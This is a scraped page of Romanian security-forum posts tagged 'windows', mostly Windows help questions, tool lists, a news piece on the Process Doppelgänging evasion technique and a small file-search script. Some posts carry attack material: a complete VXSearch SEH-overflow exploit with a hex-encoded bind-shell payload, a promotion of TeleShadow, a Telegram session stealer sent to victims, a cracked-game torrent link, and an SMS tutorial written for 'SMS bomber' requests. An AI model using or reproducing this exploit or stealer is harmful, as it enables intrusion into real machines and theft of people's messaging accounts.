Search the Community
Showing results for tags 'windows'.
-
Salutare,am revenit cu un topic destul de interesant zic eu pentru cei pasionati de jocurile Rockstar. Am pentru voi GTA 5 varianta pentru [PC]! Link download torrent: Download Grand Theft Auto V / GTA 5 (v1.0.323.1, CRACKED, MULTI11) [FitGirl Initial Repack] Torrent - Kickasse Link download crack for GTA 5: Download Grand Theft Auto V [Crack V2 - for Windows 7 / 8 / 8.1] Torrent - Kickasse Cerinte de sistem minime: Operating System: Windows 8.1 64 Bit, Windows 8 64 Bit, Windows 7 64 Bit Service Pack 1, Windows Vista 64 Bit Service Pack 2* (*NVIDIA video card recommended if running Vista OS) Processor: Intel Core 2 Quad CPU Q6600 @ 2.40GHz (4 CPUs) / AMD Phenom 9850 Quad-Core Processor (4 CPUs) @ 2.5GHz - actually works on dual-core CPUs as well RAM: 4 GB Video Card: NVIDIA 9800 GT 1GB / AMD HD 4870 1GB (DX 10, 10.1, 11) DirectX: 10 HDD Space: 57 GB (~95 GB during installation of this repack) Sper ca vam fost de ajutor si am postat unde trebuie(CRED) Multumesc pentru timpul acordat! Cu stima,JrNasti.PPOW
-
Salut rst. Asa cum spune si titlul am sa va prezint cele doua metode cunoscute de mine pentru a trimite sms-uri din PC folosind un telefon android sau modem USB. 1. SMS-uri prin telefon cu android. Necesare: a. Telefon cu android (e musai ca telefonul sa beneficieze de conexiune wifi) b. Aplicatia moca SMS Gateway disponibila in Google play. [Aplicatia nu mai este disponibila in Google Play. Link de download sub articol] Dupa instalarea deschidem aplicatia si mergem in Settings, bifam "Listen for HTTP send SMS commands". Mai jos, in tab-ul HTTP SETTINGS, completam campul "Require password in URL" cu parola dorita. Dupa completarea parolei dai BACK si apoi START (In acest moment aplicatia trebuie sa-ti indice Status: RUNNING) Pentru a trimite sms va trebuii sa accesezi in browser urmatorul link: http://192.168.1.4:9090/sendsms?phone=0729XXXXXX&text=mesajsms&password=parola-ta Unde: 192.168.1.4 e IP-ul telefon-ului, asadar vezi ce ip are telefonul tau si inlocuieste-l. 0729XXXXXX numarul de telefon al destinatarului; parola-ta parola completata in pasul de mai sus De aici iti poti pune imaginatia la lucru` si poti implementa alte metode de a trimite sms-uri. Spre exemplu folosind PHP. 2. SMS-uri prin modem USB. Doh, aici e ceva mai greu insa cireasa de pe tort e faptul ca prin aceasta metoda putem trimite SMS-uri FLASH, adica ceva de genu`: Exemplu1, Exemplu2, Exemplu3. Necesare: a. Modem USB + sim (in cazul de fata folosesc un modem Vodafone K3565) 1. Instalati modem-ul in PC (Asigurati-va ca driver-ele sunt corect instalate ) 2. Descarcati GAMMU (recomand Gammu-1.33.0-Windows-64bit.zip) 3. Extrageti arhiva in 😄 si redenumeste-o in "gammu". 4. Dupa redenumire dute in: gammu/share/doc/gammu/examples/config/ si copiaza fisierele "gammurc" si "smsdrc" in C:\gammu\bin. 5. Dupa copierea fisierelor deschide "gammurc" din "C:\gammu\bin" (folosind notepad sau notepad++) 6. Aici o sa editam doar 2 linii: 6.a - device = com4 - Ei bine com4 va trebuii inlocuit cu COM-ul folosit de modemul tau. In cazul meu com3 6.b - connection = irdaphonet - Aici sterge irdaphonet si pune at115200. 6.c Dupa editare fisierul trebuie sa arate asa (mai putin com3, difera de la caz la caz): Salveaza si inchide. 7. Pentru a ne asigura ca totul este in regula iar gammu comunica cu modeul USB, deschide CMD si scrie: cd c:/gammu/bin 8. In aceasi fereastra scrie: gammu identify Daca COM-ul editat mai sus este cel corect, gammu identifica modem-ul. 9. Din acest moment poti trimite sms-uri folosind aceste comenzi: SMS gammu sendsms TEXT 0729XXXXXX -text "RST TEST." FLASH SMS In urma testelor am constatat ca acest tip de sms-uri adica CLASS 0 nu mai sunt permise de operator, in cazul meu Vodafone. gammu sendsms TEXT 0729XXXXXX -flash -text "RST TEST." DOWNLOAD SMSGATEWAY PS: Nu exista o sursa exacta a tutorial-ului. Tot cea ce gasiti aici este cea ce am invatat eu din mai multe tutoriale atunci cand am vrut sa pun la punct "celebrul" site de trimis sms-uri. . Am facut acest tutorial in urma cererii tot mai mare de SMS BOMBER si nu numai. Sper sa va ajute. Daca aveti nelamuriri nu ezitati sa-mi scrieti. ZbYe PSS: DACA TOT COPIATI ARTICOLUL PUNETI SI VOI MACAR UN LINK CATRE RST! PENTRU SUPORT NU DE ALTA...
- 20 replies
-
- 5
-
- gammu
- sms din pc
-
(and 3 more)
Tagged with:
-
Cum as putea sa vad modulele importate de un executabil intr-un mod automat si rapid a unui executabil windows? Am niste fisiere/executabile care in fisier raw nu are importate anumite dll-uri pe care le folosesti si am nevoie sa stiu ce dll-uri sau functii de winapi foloseste in executia lui; Se poate vedea asta intr-o anumita masura si sa se poata face asta intr-un mod automat(gen script python sau commandline tool)? Pana acum am gasit dependency walker dar nu pare sa pot automatiza procesul si dureaza un pic pana obtin lista de dll-uri, respectiv listdlls de la sysinternals, dar e pentru procese care ruleaza deja, nu pentru fisiere/executabile statice
-
A team of security researchers has discovered a new malware evasion technique that could help malware authors defeat most of the modern antivirus solutions and forensic tools. Dubbed Process Doppelgänging, the new fileless code injection technique takes advantage of a built-in Windows function and an undocumented implementation of Windows process loader. Ensilo security researchers Tal Liberman and Eugene Kogan, who discovered the Process Doppelgänging attack, presented their findings today at Black Hat 2017 Security conference held in London. Process Doppelgänging Works on All Windows Versions Apparently, Process Doppelgänging attack works on all modern versions of Microsoft Windows operating system, starting from Windows Vista to the latest version of Windows 10. Tal Liberman, the head of the research team at enSilo, told The Hacker New that this malware evasion technique is similar to Process Hollowing—a method first introduced years ago by attackers to defeat the mitigation capabilities of security products. In Process Hollowing attack, hackers replace the memory of a legitimate process with a malicious code so that the second code runs instead of the original, tricking process monitoring tools and antivirus into believing that the original process is running. Since all modern antivirus and security products have been upgraded to detect Process Hollowing attacks, use of this technique is not a great idea anymore. On the other hand, Process Doppelgänging is an entirely different approach to achieve the same, by abusing Windows NTFS Transactions and an outdated implementation of Windows process loader, which was originally designed for Windows XP, but carried throughout all later versions of Windows. Here's How the Process Doppelgänging Attack Works: Before going further on how this new code injection attack works, you need to understand what Windows NTFS Transaction is and how an attacker could leverage it to evade his malicious actions. NTFS Transaction is a feature of Windows that brings the concept of atomic transactions to the NTFS file system, allowing files and directories to be created, modified, renamed, and deleted atomically. NTFS Transaction is an isolated space that allows Windows application developers to write file-output routines that are guaranteed to either succeed completely or fail completely. According to the researcher, Process Doppelgänging is a fileless attack and works in four major steps as mentioned below: Transact—process a legitimate executable into the NTFS transaction and then overwrite it with a malicious file. Load—create a memory section from the modified (malicious) file. Rollback—rollback the transaction (deliberately failing the transaction), resulting in the removal of all the changes in the legitimate executable in a way they never existed. Animate—bring the doppelganger to life. Use the older implementation of Windows process loader to create a process with the previously created memory section (in step 2), which is actually malicious and never saved to disk, "making it invisible to most recording tools such as modern EDRs." Process Doppelgänging Evades Detection from Most Antiviruses Liberman told The Hacker News that during their research they tested their attack on security products from Windows Defender, Kaspersky Labs, ESET NOD32, Symantec, Trend Micro, Avast, McAfee, AVG, Panda, and even advance forensic tools. In order to demonstrate, the researchers used Mimikatz, a post-exploitation tool that helps extract credentials from the affected systems, with Process Doppelgänging to bypass antivirus detection. When the researchers ran Mimikatz generally on a Windows operating system, Symantec antivirus solution caught the tool immediately, as shown below: However, Mimikatz ran stealthy, without antivirus displaying any warning when executed using Process Doppelgänging, as shown in the image at top of this article. Liberman also told us that Process Doppelgänging works on even the latest version of Windows 10, except Windows 10 Redstone and Fall Creators Update, released earlier this year. But due to a different bug in Windows 10 Redstone and Fall Creators Update, using Process Doppelgänging causes BSOD (blue screen of death), which crashes users' computers. Ironically, the crash bug was patched by Microsoft in later updates, allowing Process Doppelgänging to run on the latest versions of Windows 10. I don't expect Microsoft to rush for an emergency patch that could make some software relying on older implementations unstable, but Antivirus companies can upgrade their products to detect malicious programs using Process Doppelgänging or similar attacks. This is not the very first time when enSilo researchers have discovered a malware evasion technique. Previously they discovered and demonstrated AtomBombing technique which also abused a designing weakness in Windows OS. In September, enSilo researchers also disclosed a 17-year-old programming error in Microsoft Windows kernel that prevented security software from detecting malware at runtime when loaded into system memory. Via thehackernews.com
-
- 2
-
- process doppelgänging
- windows
-
(and 2 more)
Tagged with:
-
TeleShadow Stealing desktop telegrams has never been so easy ! Set the email and sender details of the sender and recipient and send it to the victim after compiling. How do I use the session file? Delete everything inside folder at "C:\Users\YourName\AppData\Roaming\Telegram Desktop\tdata" Then Replace Uncompressed files inside tdata folder who resiver from victim to your telegram tdata ! What features does it have? Bypass Two-step confirmation Bypass Inherent identity and need 5-digit verification code Support for the official telegram and IGram desktop unofficial only windows ! Thanks to jeje Plus mr3chb1 Rojhelat Report bugs Telegram : @N3verlove Disclaimer: The consequences of any use shall be borne by the person and the manufacturer or the publisher shall not be liable to any Download: TeleShadow-master.zip or git clone https://github.com/ParsingTeam/TeleShadow.git Source: https://github.com/ParsingTeam/TeleShadow
-
#!/usr/bin/env python # # Exploit Title : VXSearch v10.2.14 Local SEH Overflow # Date : 11/16/2017 # Exploit Author : wetw0rk # Vendor Homepage : http://www.flexense.com/ # Software link : http://www.vxsearch.com/setups/vxsearchent_setup_v10.2.14.exe # Version : 10.2.14 # Tested on : Windows 7 (x86) # Description : VX Search v10.2.14 suffers from a local buffer overflow. The # following exploit will generate a bind shell on port 1337. I # was unable to get a shell working with msfvenom shellcode so # below is a custom alphanumeric bind shell. Greetz rezkon ;) # # trigger the vulnerability by : # Tools -> Advanced options -> Proxy -> *Paste In Proxy Host Name # import struct shellcode = "w00tw00t" shellcode += ( "\x25\x4a\x4d\x4e\x55" # and eax, 0x554e4d4a "\x25\x35\x32\x31\x2a" # and eax, 0x2a313235 "\x2d\x6a\x35\x35\x35" # sub eax, 0x3535356a "\x2d\x65\x6a\x6a\x65" # sub eax, 0x656a6a65 "\x2d\x61\x64\x4d\x65" # sub eax, 0x654d6461 "\x50" # push eax "\x5c" # pop esp ) shellcode += ( "\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x4f\x4f\x4f\x4f" "\x2d\x4f\x30\x4f\x68\x2d\x62\x2d\x62\x72\x50\x25\x4a\x4d\x4e" "\x55\x25\x35\x32\x31\x2a\x2d\x76\x57\x57\x63\x2d\x77\x36\x39" "\x32\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x41\x54" "\x54\x54\x2d\x25\x54\x7a\x2d\x2d\x25\x52\x76\x36\x50\x25\x4a" "\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x49\x35\x49\x49\x2d\x49" "\x25\x49\x69\x2d\x64\x25\x72\x6c\x50\x25\x4a\x4d\x4e\x55\x25" "\x35\x32\x31\x2a\x2d\x70\x33\x33\x25\x2d\x70\x25\x70\x25\x2d" "\x4b\x6a\x56\x39\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a" "\x2d\x79\x55\x75\x32\x2d\x79\x75\x75\x55\x2d\x79\x77\x77\x78" "\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x25\x4a\x4a" "\x25\x2d\x39\x5f\x4d\x34\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32" "\x31\x2a\x2d\x4b\x57\x4b\x57\x2d\x70\x76\x4b\x79\x2d\x70\x76" "\x78\x79\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x49" "\x49\x49\x49\x2d\x49\x4e\x64\x49\x2d\x78\x25\x78\x25\x2d\x6f" "\x25\x7a\x48\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d" "\x58\x58\x38\x58\x2d\x58\x30\x32\x58\x2d\x51\x46\x2d\x47\x50" "\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x5f\x52\x5f\x5f" "\x2d\x5f\x25\x25\x35\x2d\x62\x39\x25\x25\x50\x25\x4a\x4d\x4e" "\x55\x25\x35\x32\x31\x2a\x2d\x4a\x4a\x4a\x4a\x2d\x4a\x4a\x4a" "\x4a\x2d\x79\x39\x4a\x79\x2d\x6d\x32\x4b\x68\x50\x25\x4a\x4d" "\x4e\x55\x25\x35\x32\x31\x2a\x2d\x30\x30\x71\x30\x2d\x30\x25" "\x71\x30\x2d\x38\x31\x51\x5f\x50\x25\x4a\x4d\x4e\x55\x25\x35" "\x32\x31\x2a\x2d\x32\x32\x32\x32\x2d\x78\x77\x7a\x77\x50\x25" "\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x62\x62\x62\x62\x2d" "\x48\x57\x47\x4f\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a" "\x2d\x76\x76\x4f\x4f\x2d\x36\x39\x5a\x5a\x50\x25\x4a\x4d\x4e" "\x55\x25\x35\x32\x31\x2a\x2d\x61\x61\x61\x61\x2d\x4a\x61\x4a" "\x25\x2d\x45\x77\x53\x35\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32" "\x31\x2a\x2d\x63\x63\x63\x63\x2d\x39\x63\x63\x2d\x2d\x32\x63" "\x7a\x25\x2d\x31\x49\x7a\x25\x50\x25\x4a\x4d\x4e\x55\x25\x35" "\x32\x31\x2a\x2d\x72\x79\x79\x79\x2d\x25\x30\x25\x30\x2d\x25" "\x32\x25\x55\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d" "\x58\x58\x41\x58\x2d\x58\x58\x25\x77\x2d\x6e\x51\x32\x69\x50" "\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x48\x77\x38\x48" "\x2d\x4e\x76\x6e\x61\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31" "\x2a\x2d\x41\x41\x6e\x6e\x2d\x31\x31\x30\x6e\x2d\x37\x36\x30" "\x2d\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x38\x38" "\x38\x38\x2d\x38\x79\x38\x25\x2d\x38\x79\x38\x25\x2d\x58\x4c" "\x73\x25\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x61" "\x52\x61\x52\x2d\x37\x4a\x31\x49\x50\x25\x4a\x4d\x4e\x55\x25" "\x35\x32\x31\x2a\x2d\x4d\x47\x4d\x4d\x2d\x30\x25\x4d\x6b\x2d" "\x36\x32\x66\x71\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a" "\x2d\x36\x43\x43\x6c\x2d\x33\x54\x47\x25\x50\x25\x4a\x4d\x4e" "\x55\x25\x35\x32\x31\x2a\x2d\x4c\x4c\x4c\x4c\x2d\x6e\x4c\x6e" "\x36\x2d\x65\x67\x6f\x25\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32" "\x31\x2a\x2d\x25\x25\x4b\x4b\x2d\x25\x25\x6f\x4b\x2d\x4e\x41" "\x59\x2d\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x41" "\x41\x41\x41\x2d\x52\x52\x78\x41\x2d\x6e\x6c\x70\x25\x50\x25" "\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x30\x6c\x30\x30\x2d" "\x30\x6c\x6c\x30\x2d\x38\x70\x79\x66\x50\x25\x4a\x4d\x4e\x55" "\x25\x35\x32\x31\x2a\x2d\x42\x70\x70\x45\x2d\x32\x45\x70\x31" "\x2d\x25\x4b\x49\x31\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31" "\x2a\x2d\x25\x50\x50\x50\x2d\x25\x7a\x72\x25\x2d\x4e\x73\x61" "\x52\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x35\x77" "\x74\x74\x2d\x61\x78\x35\x34\x50\x25\x4a\x4d\x4e\x55\x25\x35" "\x32\x31\x2a\x2d\x30\x30\x30\x30\x2d\x30\x30\x59\x30\x2d\x30" "\x30\x74\x51\x2d\x6b\x36\x79\x67\x50\x25\x4a\x4d\x4e\x55\x25" "\x35\x32\x31\x2a\x2d\x75\x38\x43\x43\x2d\x7a\x31\x43\x43\x2d" "\x7a\x2d\x77\x79\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a" "\x2d\x59\x59\x59\x59\x2d\x59\x59\x59\x59\x2d\x6f\x6c\x4d\x77" "\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x45\x45\x45" "\x45\x2d\x34\x2d\x76\x45\x2d\x37\x25\x5a\x65\x50\x25\x4a\x4d" "\x4e\x55\x25\x35\x32\x31\x2a\x2d\x34\x34\x34\x34\x2d\x62\x34" "\x34\x34\x2d\x6d\x56\x47\x57\x50\x25\x4a\x4d\x4e\x55\x25\x35" "\x32\x31\x2a\x2d\x2d\x2d\x2d\x2d\x2d\x76\x2d\x2d\x76\x2d\x55" "\x4c\x55\x7a\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d" "\x77\x77\x77\x30\x2d\x47\x47\x79\x30\x2d\x42\x42\x39\x34\x50" "\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x56\x75\x36\x51" "\x2d\x42\x61\x49\x43\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31" "\x2a\x2d\x56\x56\x31\x56\x2d\x31\x79\x31\x25\x2d\x50\x6c\x48" "\x34\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x72\x72" "\x72\x72\x2d\x72\x25\x38\x38\x2d\x38\x25\x25\x25\x2d\x54\x41" "\x30\x30\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x47" "\x47\x47\x76\x2d\x47\x47\x76\x76\x2d\x6b\x72\x6c\x5a\x50\x25" "\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x25\x71\x25\x71\x2d" "\x73\x42\x63\x68\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a" "\x2d\x48\x55\x51\x51\x2d\x45\x78\x4f\x5a\x50\x25\x4a\x4d\x4e" "\x55\x25\x35\x32\x31\x2a\x2d\x45\x45\x45\x32\x2d\x45\x45\x25" "\x31\x2d\x76\x75\x2d\x25\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32" "\x31\x2a\x2d\x6e\x4f\x6d\x6e\x2d\x35\x48\x5f\x5f\x50\x25\x4a" "\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x2d\x2d\x2d\x2d\x2d\x71" "\x2d\x2d\x71\x2d\x71\x2d\x4a\x71\x2d\x66\x65\x70\x62\x50\x25" "\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x56\x30\x56\x30\x2d" "\x56\x38\x25\x30\x2d\x74\x37\x25\x45\x50\x25\x4a\x4d\x4e\x55" "\x25\x35\x32\x31\x2a\x2d\x32\x32\x32\x77\x2d\x32\x32\x32\x32" "\x2d\x43\x41\x4a\x57\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31" "\x2a\x2d\x63\x63\x63\x30\x2d\x79\x41\x41\x6e\x50\x25\x4a\x4d" "\x4e\x55\x25\x35\x32\x31\x2a\x2d\x4b\x4b\x4b\x4b\x2d\x4b\x4b" "\x25\x31\x2d\x4b\x71\x25\x32\x2d\x4f\x6e\x25\x2d\x50\x25\x4a" "\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x37\x37\x37\x37\x2d\x6d" "\x37\x6d\x37\x2d\x6d\x37\x6d\x37\x2d\x64\x55\x63\x58\x50\x25" "\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x44\x6c\x6c\x6c\x2d" "\x34\x44\x44\x6c\x2d\x30\x33\x4e\x54\x50\x25\x4a\x4d\x4e\x55" "\x25\x35\x32\x31\x2a\x2d\x2d\x7a\x43\x2d\x2d\x48\x79\x71\x47" "\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x41\x41\x41" "\x41\x2d\x41\x46\x71\x25\x2d\x5a\x77\x7a\x32\x50\x25\x4a\x4d" "\x4e\x55\x25\x35\x32\x31\x2a\x2d\x47\x47\x47\x47\x2d\x47\x6e" "\x47\x6e\x2d\x47\x78\x6e\x78\x2d\x47\x79\x77\x79\x50\x25\x4a" "\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x74\x38\x69\x38\x2d\x51" # 0day.today [2017-11-17] # Source: 0day.today
-
ADS stands for Alternate Data Stream. It is a file attribute only found on the NTFS file system. ADS is the lesser known feature of Windows NTFS file system which provides the ability to put data into existing files and folders without affecting their functionality and size. It is used legitimately by Windows and other applications to store additional information (for example summary information) for the file. Even 'Internet Explorer' adds the stream named 'Zone.Identifier' to every file downloaded from the internet. ADS have been given a bad reputation because their capability to hide data from us on our own computer, has been abused by malware writers in the past. More info: Technet Microsoft Blog Malware Bytes Blog on ADS ADS on rootkitanalytics.com More on NTFS Tool to identify ADS on Windows Systems: ADS-Revealer Stay safe!
-
- 3
-
Salut , ma numesc Mihai , am nevoie de cineva care se pricepe cu windows , in special legat de partea administrator , dau mai multe detalii in privat , as fii foarte recunoscator daca m.ati putea ajuta ! Pentru voi nu cred ca ar fii o problema , pt mine este ca nu stiu mai nimic legat de ''heck.uiala'' din asta .)) , Astept Pm in privat ! ps > scuze ca am postat aici , nu stiam unde sa creez topic , sunt nivel 0 , incepator . Si am o rugaminte , anume , va rog tare mult sa numai faceti misto , numai dau nume cine , dar pe langa faptul ca vorbiti urat ,va bateti joc unii ... .
-
Un mic programel pentru a cauta in toate sub-directoarele dintr-un director dat o anumita fraza/cuvant: from os import walk from os.path import join import argparse def get_files(base_path, extension=None): for dirpath, _, filenames in walk(base_path): for filename in filenames: if filename.endswith(extension): yield join(dirpath, filename) def search_sentence_in_files(files, sentence): for filepath in files: with open(filepath) as fp: for line_number, line in enumerate(fp): if sentence in line: yield filepath, line_number, line.strip() def main(files, sentence): results = search_sentence_in_files(files, sentence) for filepath, line, content in results: print('[# FILE PATH #] {} ...'.format(filepath)) print('[# LINE NUMBER #] At line {}'.format(line)) print('[# LINE CONTENT #] Content: {}'.format(content)) print('-' * 80) if __name__ == '__main__': parser = argparse.ArgumentParser(description='Search text in files') parser.add_argument('sentence') parser.add_argument('-p', '--basepath', help='folder in wich files will be examinated', default=r'default_path') parser.add_argument('-e', '--extension', help='extension of files to examine', default='.txt') args = parser.parse_args() files = get_files(args.basepath, args.extension) main(files, args.sentence) Poate fi rulat cu Python 2.x/3.x. Poate primi ca argumente: - cuvantul / fraza dorita - basepath (in ce director sa caute) - extensia fisierelor in care doriti sa cautati fraza / cuvantul dorit. De adaugat: - indexare - regex functionality Enjoy
- 1 reply
-
- 3
-
- python
- programare
-
(and 1 more)
Tagged with:
-
The Portable Executable (PE) format is a file format for executables, object code, DLLs, FON Font files, and others used in 32-bit and 64-bit versions of Windows operating systems. The PE format is a data structure that encapsulates the information necessary for the Windows OS loader to manage the wrapped executable code. [1] It is called "portable" because you can use it between different versions of Windows OS not among different distros (Linux/OSX). Hope you find it useful! Detect it Easy Exeinfo PE ExplorerSuite PEiD PEStudio Resource Hacker FileAlyzer PEBrowser PEview RunPE Detector [1]: Wikipedia
-
Policy Analyzer ========= Policy Analyzer is a utility for analyzing and comparing sets of Group Policy Objects (GPOs). It can highlight when a set of Group Policies has redundant settings or internal inconsistencies, and can highlight the differences between versions or sets of Group Policies. It can also compare GPOs against current local policy settings and against local registry settings. And you can export its findings to a Microsoft Excel spreadsheet. Policy Analyzer is a lightweight standalone application that doesn’t require installation, and doesn’t require administrative rights (except for the “local policy” feature). Link: Policy Analyzer
-
Va salut am un laptop sony vaio mai vechi model pcg-c1xd si nu pot sa instalez windows 98 pe el.Am incercat mai multe metode inclusiv cu discheta.Stima.
-
Hello RST : Exploit Development Course 2015 --> Free Preface Hi and welcome to this website! I know people don’t like to read prefaces, so I’ll make it short and right to the point. This is the preface to a course about Modern Windows Exploit Development. I chose Windows because I’m very familiar with it and also because it’s very popular. In particular, I chose Windows 7 SP1 64-bit. Enough with Windows XP: it’s time to move on! There are a few full-fledged courses about Exploit Development but they’re all very expensive. If you can’t afford such courses, you can scour the Internet for papers, articles and some videos. Unfortunately, the information is scattered all around the web and most resources are definitely not for beginners. If you always wanted to learn Exploit Development but either you couldn’t afford it or you had a hard time with it, you’ve come to the right place! This is an introductory course but please don’t expect it to be child’s play. Exploit Development is hard and no one can change this fact, no matter how good he/she is at explaining things. I’ll try very hard to be as clear as possible. If there’s something you don’t understand or if you think I made a mistake, you can leave a brief comment or create a thread in the forum for a longer discussion. I must admit that I’m not an expert. I did a lot of research to write this course and I also learned a lot by writing it. The fact that I’m an old-time reverse engineer helped a lot, though. In this course I won’t just present facts, but I’ll show you how to deduce them by yourself. I’ll try to motivate everything we do. I’ll never tell you to do something without giving you a technical reason for it. In the last part of the course we’ll attack Internet Explorer 10 and 11. My main objective is not just to show you how to attack Internet Explorer, but to show you how a complex attack is first researched and then carried out. Instead of presenting you with facts about Internet Explorer, we’re going to reverse engineer part of Internet Explorer and learn by ourselves how objects are laid out in memory and how we can exploit what we’ve learned. This thoroughness requires that you understand every single step of the process or you’ll get lost in the details. As you’ve probably realized by now, English is not my first language (I’m Italian). This means that reading this course has advantages (learning Exploit Development) and disadvantages (unlearning some of your English). Do you still want to read it? Choose wisely To benefit from this course you need to know and be comfortable with X86 assembly. This is not negotiable! I didn’t even try to include an assembly primer in this course because you can certainly learn it on your own. Internet is full of resources for learning assembly. Also, this course is very hands-on so you should follow along and replicate what I do. I suggest that you create at least two virtual machines with Windows 7 SP1 64-bit: one with Internet Explorer 10 and the other with Internet Explorer 11. I hope you enjoy the ride! Contents WinDbg Mona 2 Structure Exception Handling (SEH) Heap Windows Basics Shellcode Exploitme1 (ret eip overwrite) Exploitme2 (Stack cookies & SEH) Exploitme3 (DEP) Exploitme4 (ASLR) Exploitme5 (Heap Spraying & UAF) EMET 5.2 Internet Explorer 10 Reverse Engineering IE From one-byte-write to full process space read/write God Mode (1) God Mode (2) Use-After-Free bug Internet Explorer 11 Part 1 Part 2 Regards NO-MERCY PDF'S Soooooooon Source : http://expdev-kiuhnm.rhcloud.com/2015/05/11/contents/
- 9 replies
-
- 1
-
- development
- exploit
-
(and 3 more)
Tagged with:
-
Windows Malware Analysis Essentials Master the fundamentals of malware analysis for the Windows platform and enhance your anti-malware skill set Author: Victor Marak Read: https://www.scribd.com/doc/283049338/Windows-Malware-Analysis-Essentials Download: https://www.sendspace.com/file/rbwzjv
-
Salut RST am un laptop acer 1690 si vreau sa ii instalez un windows dar nu stiu ce sa setez in boot menu ma puteti ajuta are 512 mb ram si vreau sa instalez un Windows xp . P.S. am luat imaginile de pe internet dar cel din imagin este la fel ca al meu astept raspunsuri ms ;) astea sunt drivere din boot cum trebuie sa le pun scz ca intreb dar sunt incepator si e mai complicat cu pc-uri mai vechi
-
Salut RST recent mi-am facut Windows 8.1 windowsul vechi mi-a fost virusat si nu mai putea-m sa il accesesz imi spunea "Prepair automatic repair" se mai incarca putin si imi spunea "Diagnosic your Pc" si nu puteam sa il accesez dar puteam sa intru in fisierele de pe pc sa aleg un driver sa se instaleze ceva din "System 32/logfile " undeva pe acolo si am bagat un dvd bootabil cu windows 8.1 in Pc am intrat in el Si am dat click dreapta pe setup dupa aia am dat open si am instalat alt windows intrebarea este cum procedez daca mai am de facut vreodata windows stiu ca era ceva cu F6 sau F7 sau undeva din Boot menu nu stiu, nici cum nu am reusit doar prin metoda prezentata mai sus , cum ar trebuii sa procedez ?
-
Buna seara!sunt nou pe acest site dar o sa trec la subiect.In trecut am emulat Windows 95 si xp pe o tableta.Mergea bine (si tableta este o "bruta") si m-am gandit sa scap de lag-ul de pe android si sa incerc ceva nou.Se poate instala ca sistem de operare nativ Linux sau Ubuntu?De Windows nu intreb stiu ca trebuie portate driverele.Multumesc!
-
Salut RST. Am si eu o intrebare. Se poate instala Windows XP direct de pe HDD daca fac o partitie pe care sa pun continutul ISO-ului si sa bootez de pe ea ca sa il instalez? La windows 7 stiu ca se putea daca extrageam undeva continutul iso-ului, cu ceva programel selectam boot.wim apoi copiam continutul pe partitia creata. La restart imi aparea sa aleg Windows7 ca sa intru in windows, sau numele partitiei create pe care daca dadeam incepea instalarea. Se poate face ceva de genul si in cazul XP ?
- 1 reply
-
- care
- continutul
-
(and 3 more)
Tagged with:
-
The Windows API for Hackers and Reverse Engineers The Windows API is one of the “must know” areas for most reverse engineers and exploit writers. It’s an area than the more I use the APIs the more that I find myself looking up speific APIs and wishing that I would have known what I know now about these sometimes vague and/or mysterious functions. Why should someone who’s in the INFOSEC community care about these APIs? Well to put it shortly, they can make your life considerably easier. If you do incident response, are just getting starting writing exploits, or anything related, then you’ve likely seen these APIs mentioned before. They’re a crucial part of everything from shellcode design to malware analysis. One of the most common places you’ll run into these APIs is in malware analysis. The Windows APIs are crucial to nearly every piece of software that runs on Windows. Without these APIs malware authors would be left writing a considerable amount more code, which few malware authors want to do. Knowing that these are going to be the malware’s link to Windows itself, just examining the APIs can give you great clues about what the malware is trying to do. (Note: malware authors could statically compile their code, which would not need to import the APIs, this is not common and would leave the malware sample significantly larger) There are endless tools which will show you which APIs are being imported. Some of the most common tools are OllyDbg, Immunity Debugger, IDA Pro, MASTIFF, and countless other tools and scripts. Let’s take a look at a malware sample’s imports. kernel32.dll DeleteCriticalSection 0x4090dc kernel32.dll LeaveCriticalSection 0x4090e0 kernel32.dll EnterCriticalSection 0x4090e4 kernel32.dll VirtualFree 0x4090e8 kernel32.dll LocalFree 0x4090ec kernel32.dll GetCurrentThreadId 0x4090f0 kernel32.dll GetStartupInfoA 0x4090f4 kernel32.dll GetCommandLineA 0x4090f8 kernel32.dll FreeLibrary 0x4090fc kernel32.dll 